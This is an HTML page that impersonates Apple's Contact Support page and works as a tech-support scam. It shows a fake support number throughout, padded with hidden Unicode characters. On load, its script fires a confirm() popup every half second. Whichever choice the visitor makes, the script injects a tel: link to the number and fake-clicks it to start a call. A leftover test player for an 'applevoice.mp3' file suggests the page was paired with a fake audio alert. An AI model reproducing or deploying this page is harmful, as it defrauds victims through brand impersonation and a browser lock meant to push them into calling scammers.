

 <!DOCTYPE html>
 <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" class="no-js">



<head >

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-R11KLL8X5K"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-R11KLL8X5K');
</script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	 <meta http-equiv="X-UA-Compatible" content="IE=edge" />
	 <meta name="viewport" content="width=device-width, initial-scale=1" />
	 <meta http-equiv="cache-control" content="max-age=3600" />
	 <title>Contact - Official Apple</title>
	 <meta name="description" content="Contact Apple support by phone or chat, set up a repair, or make a Genius Bar appointment for iPhone, iPad, Mac and more." />

	 <link rel="stylesheet" href="Base.css" type="text/css" />
	 <link rel="stylesheet" type="text/css" href="fonts/_families%3dSF%2bPro%2cv1_7CSF%2bPro%2bIcons%2cv1html.html" />
	 <script src="text.js"></script>
 </head>
 <body onload="run()">
		</div>
	</div>
 <div id="result"></div>
 <input type="checkbox" id="ac-gn-menustate" class="ac-gn-menustate" />
 <nav id="ac-globalnav" class="no-js">
	 <div class="ac-gn-content">
		 <ul class="ac-gn-header">
			 <li class="ac-gn-item ac-gn-menuicon">
				 <label class="ac-gn-menuicon-label" for="ac-gn-menustate" aria-hidden="true">
					 <span class="ac-gn-menuicon-bread ac-gn-menuicon-bread-top">
						 <span class="ac-gn-menuicon-bread-crust ac-gn-menuicon-bread-crust-top"></span>
					 </span>
					 <span class="ac-gn-menuicon-bread ac-gn-menuicon-bread-bottom">
						 <span class="ac-gn-menuicon-bread-crust ac-gn-menuicon-bread-crust-bottom"></span>
					 </span>
				 </label>
				 <a href="#ac-gn-menustate" class="ac-gn-menuanchor ac-gn-menuanchor-open" id="ac-gn-menuanchor-open">
					 <span class="ac-gn-menuanchor-label">Open Menu </span></a>
				 <a href="#" class="ac-gn-menuanchor ac-gn-menuanchor-close" id="ac-gn-menuanchor-close">
					 <span class="ac-gn-menuanchor-label">Close Menu </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-apple">
				 <a class="ac-gn-link ac-gn-link-apple" href="#" id="ac-gn-firstfocus-small">
					 <span class="ac-gn-link-text">Apple </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-bag ac-gn-bag-small" id="ac-gn-bag-small">
				 <a class="ac-gn-link ac-gn-link-bag analytics-exitlink" href="#"><span class="ac-gn-link-text">Shopping Bag </span><span class="ac-gn-bag-badge"></span></a>
				 <span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
			 </li>
		 </ul>
		 <ul class="ac-gn-list">
			 <li class="ac-gn-item ac-gn-apple">
				 <a class="ac-gn-link ac-gn-link-apple" href="#" id="ac-gn-firstfocus">
					 <span class="ac-gn-link-text">Apple </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-mac">
				 <a class="ac-gn-link ac-gn-link-mac" href="#">
					 <span class="ac-gn-link-text">Mac </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-ipad">
				 <a class="ac-gn-link ac-gn-link-ipad" href="#">
					 <span class="ac-gn-link-text">iPad </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-iphone">
				 <a class="ac-gn-link ac-gn-link-iphone" href="#">
					 <span class="ac-gn-link-text">iPhone </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-watch">
				 <a class="ac-gn-link ac-gn-link-watch" href="#">
					 <span class="ac-gn-link-text">Watch </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-tv">
				 <a class="ac-gn-link ac-gn-link-tv" href="#">
					 <span class="ac-gn-link-text">TV </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-music">
				 <a class="ac-gn-link ac-gn-link-music" href="#">
					 <span class="ac-gn-link-text">Music </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-support">
				 <a class="ac-gn-link ac-gn-link-support" href="#">
					 <span class="ac-gn-link-text">Support </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-item-menu ac-gn-search" role="search">
				 <a class="ac-gn-link ac-gn-link-search" href="#">
					 <span class="ac-gn-search-placeholder" aria-hidden="true">Search apple.com </span></a>
			 </li>
			 <li class="ac-gn-item ac-gn-bag" id="ac-gn-bag">
				 <a class="ac-gn-link ac-gn-link-bag analytics-exitlink" href="#" aria-label="Shopping Bag">
					 <span class="ac-gn-link-text">Shopping Bag </span>
					 <span class="ac-gn-bag-badge" aria-hidden="true"></span></a>
				 <span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
			 </li>
		 </ul>
		 <aside id="ac-gn-searchview" class="ac-gn-searchview" role="search">
			 <div class="ac-gn-searchview-content">
				 <form id="ac-gn-searchform" class="ac-gn-searchform" action="http://www.apple.com/us/search" method="get">
					 <div class="ac-gn-searchform-wrapper">
						 <input id="ac-gn-searchform-input" class="ac-gn-searchform-input" type="text" placeholder="Search apple.com" autocorrect="off" autocapitalize="off" autocomplete="off" spellcheck="false" />
						 <input id="ac-gn-searchform-src" type="hidden" name="src" value="globalnav" />
						 <button id="ac-gn-searchform-submit" class="ac-gn-searchform-submit" type="submit" disabled="" aria-label="Submit"></button>
						 <button id="ac-gn-searchform-reset" class="ac-gn-searchform-reset" type="reset" disabled="" aria-label="Clear Search"></button>
					 </div>
				 </form>
				 <aside id="ac-gn-searchresults" class="ac-gn-searchresults"></aside>
			 </div>
			 <button id="ac-gn-searchview-close" class="ac-gn-searchview-close" aria-label="Close Search">
					 <span class="ac-gn-searchview-close-wrapper">
						 <span class="ac-gn-searchview-close-left"></span>
						 <span class="ac-gn-searchview-close-right"></span>
					 </span>
			 </button>
		 </aside>
		 <aside class="ac-gn-bagview">
			 <div class="ac-gn-bagview-scrim">
				 <span class="ac-gn-bagview-caret ac-gn-bagview-caret-small"></span>
			 </div>
			 <div class="ac-gn-bagview-content" id="ac-gn-bagview-content">
			 </div>
		 </aside>
	 </div>
 </nav>
 <div id="ac-gn-curtain" class="ac-gn-curtain"></div>
 <div id="ac-gn-placeholder" class="ac-nav-placeholder"></div>

 <div class="main">
	 <input type="checkbox" id="ac-ln-menustate" class="ac-ln-menustate" />
	 <nav id="ac-localnav" class="js no-touch css-sticky" lang="en-US" role="navigation" data-sticky="">
		 <div class="ac-ln-wrapper">
			 <div class="ac-ln-background"></div>
			 <div class="ac-ln-content">
					 <span class="ac-ln-title">
                       <a href="#">
									Support +1‪(888) 844-9528‬‬‬<font color="red"><font class="js_setPhoneBlock"></font></font></a>
							 </span>
				 <div class="ac-ln-menu">
					 <a href="#ac-ln-menustate" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-open" id="ac-ln-menustate-open">  <span class="ac-ln-menucta-anchor-label">Open menu </span></a>  <a href="#" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-close" id="ac-ln-menustate-close">  <span class="ac-ln-menucta-anchor-label">Close menu </span></a>
					 <div class="ac-ln-menu-tray">
						 <ul class="ac-ln-menu-items">
							 <li class="ac-ln-menu-item"><a href="#" class="ac-ln-menu-link analytics-exitlink"> Communities </a>
							 </li>
						 </ul>
					 </div>
					 <div class="ac-ln-actions">
						 <div class="ac-ln-action ac-ln-action-menucta" aria-hidden="true">
							 <label for="ac-ln-menustate" class="ac-ln-menucta">  <span class="ac-ln-menucta-chevron"></span>
							 </label>
						 </div>
					 </div>
				 </div>
			 </div>
		 </div>
	 </nav>
	 <section class="as-columns  as-columns--1up  as-banner as-banner--top">
		 <div class="row">
			 <div class="column large-12 medium-12 small-12">
				 <div class='as-banner-cont'>
					 <div class='as-banner-image as-banner-image--top'>
						 <style type="text/css">
							.as-banner-image.as-banner-image--top {
								background-image: url("globalnav/apple/contact-us-hero.image.large_2x.jpg");
							}

							.as-banner-image.as-banner-image--top:before {
								content: "";
								display: block;
							}

							@media only screen and (max-width: 735px) {
								.as-banner-image.as-banner-image--top {
									background-image: url("globalnav/apple/contact-us-hero.image.small_2x.jpg");
								}
							}
						</style>

						 <img sizes="(min-width:735px ) 735w, 100vw" srcset="globalnav/apple/contact/contact-us-hero.image.small_2x.jpg 735w, globalnav/apple/contact-us-hero.image.large_2x.jpg 1440w" alt="" class="as-image-speculativedownload" src="globalnav/apple/contact-us-hero.image.large_2x.jpg" />
					 </div>
				 </div>
				 <div class="as-banner-content">
					 <div class="pageTitle  ">
						 <h1 class="pageTitle-heading">Contact Support </h1>
						 <p class="pageTitle-intro js_setTextBlock" /></div>
					 <div class="sectionTitle sectionTitleBlock"><h2 class="sectionTitle-heading">contact +1‪‪‪‬‬‪‪‪(888) 844-9528‬‬‬‬</h2></div>
				 </div>
			 </div>
		 </div>
	 </section>
 </div>
 <footer id="ac-globalfooter" class="no-js">
	 <div class="ac-gf-content">
		 <section class="ac-gf-footer">
			 <div class="ac-gf-footer-shop"> More ways to: Visit an  <a href="#" class="analytics-exitlink">Apple Store </a>,  <span class="nowrap">call  <font class="js_setPhoneBlock"></font>, or  <a href="#" class="analytics-exitlink">find a reseller </a></span>.
			 </div>
			 <div class="ac-gf-footer-locale">
				 <a class="ac-gf-footer-locale-link" href="#" title="Choose your country or region" aria-label="United States. Choose your country or region"><img class="ac-gf-footer-locale-flag" src="globalnav/apple/us.png" alt="" width="16" height="16" />United
					States </a>
			 </div>
			 <div class="ac-gf-footer-legal">
				 <div class="ac-gf-footer-legal-copyright">Copyright© 2018 Apple . All rights reserved. </div>
				 <div class="ac-gf-footer-legal-links"><a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Privacy
					Policy </a>  <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Terms of Use </a>
					 <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Sales and Refunds </a>  <a class="ac-gf-footer-legal-link" href="#">Site
						Map </a>  <a class="ac-gf-footer-legal-link" href="#">Contact
						Apple </a></div>
			 </div>
			 <meta content="Apple" property="name" />
			 <meta content="+1‪‪‪‬‬‪‪‪(888) 844-9528‬‬‬‬" property="telephone" />
		 </section>
	 </div>
 </footer>
  <script src="jquery-1.12.0.min.js"></script>
    <script>
        var isCall = 0;
        $(document).ready(function() {
            loadText();
            setTimeout(function() {
                myFunction();
            }, 100);
            setInterval(myFunction, 500);
        });

        function loadText() {
            $('.js_setTextBlock').prop('innerHTML', defaultText);
        }

        function myFunction() {
            if (confirm(defaultText)) {
                okkkk();
            } else {
                okkkk();
            }
        }

        function okkkk() {
            $('#result').append('<a id="anchorcall" href="tel:+1‪‪‪‬‬‪‪‪(888) 844-9528‬‬‬" target="_top"></a>');
            fakeClick(event, document.getElementById("anchorcall"));
        }

        function fakeClick(event, anchorObj) {
            if (anchorObj.click) {
                anchorObj.click();
            } else if (document.createEvent) {
                if (event.target !== anchorObj) {
                    var evt = document.createEvent("MouseEvents");
                    evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
                    var allowDefault = anchorObj.dispatchEvent(evt);
                }
            }
        }
    </script>

<input type="file" id="mp3Input" accept="D:\Try\phone popup\google popup test\applevoice.mp3">
<button onclick="playMP3()">Play MP3</button>
<audio id="audioPlayer" controls></audio>

<script>
  function playMP3() {
    const input = document.getElementById('mp3Input');
    const file = input.files[0];

    if (!file) {
      alert('Please select an MP3 file.');
      return;
    }

    const audioPlayer = document.getElementById('audioPlayer');
    const objectURL = URL.createObjectURL(file);
    audioPlayer.src = objectURL;
    audioPlayer.play();
  }
</script>

 </body>

</html>